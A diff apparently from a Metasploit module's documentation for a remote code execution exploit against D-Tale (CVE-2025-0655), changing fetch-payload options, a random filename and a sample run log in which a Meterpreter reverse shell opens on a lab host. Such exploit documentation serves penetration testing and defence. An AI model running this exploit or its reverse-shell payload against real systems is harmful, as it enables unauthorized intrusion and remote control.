@@ -61,8 +61,8 @@ Payload options (cmd/linux/http/x64/meterpreter_reverse_tcp):
61
61
Name Current Setting Required Description
62
62
---- --------------- -------- -----------
63
63
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
64
- FETCH_DELETE false yes Attempt to delete the binary after execution
65
- FETCH_FILELESS true yes Attempt to run payload without touching disk, Linux ≥3.17 only
64
+ FETCH_DELETE true yes Attempt to delete the binary after execution
65
+ FETCH_FILELESS false yes Attempt to run payload without touching disk, Linux ≥3.17 only
66
66
FETCH_SRVHOST no Local IP to use for serving payload
67
67
FETCH_SRVPORT 8080 yes Local port to use for serving payload
68
68
FETCH_URIPATH no Local URI to use for serving payload
@@ -74,7 +74,7 @@ Payload options (cmd/linux/http/x64/meterpreter_reverse_tcp):
74
74
75
75
Name Current Setting Required Description
76
76
---- --------------- -------- -----------
77
- FETCH_FILENAME vxItPQvVMkW no Name to use on remote system when storing payload; cannot contain spaces or slashes
77
+ FETCH_FILENAME agAyokIhdJZ no Name to use on remote system when storing payload; cannot contain spaces or slashes
78
78
FETCH_WRITABLE_DIR /tmp yes Remote writable dir to store payload; cannot contain spaces
79
79
80
80
@@ -94,7 +94,7 @@ msf6 exploit(linux/http/dtale_rce_cve_2025_0655) > run lhost=192.168.56.1 rhost=
94
94
[+] The target appears to be vulnerable. Version 3.15.1 detected.
95
95
[*] Use data_id: 1
96
96
[*] Updated the enable_custom_filters to true.
97
- [*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.17:34796 ) at 2025-03-01 11:37:14 +0900
97
+ [*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.17:33210 ) at 2025-03-03 20:49:53 +0900
98
98
[*] Successfully executed the payload.
99
99
[*] Successfully cleaned up data_id: 1
100
100
0 commit comments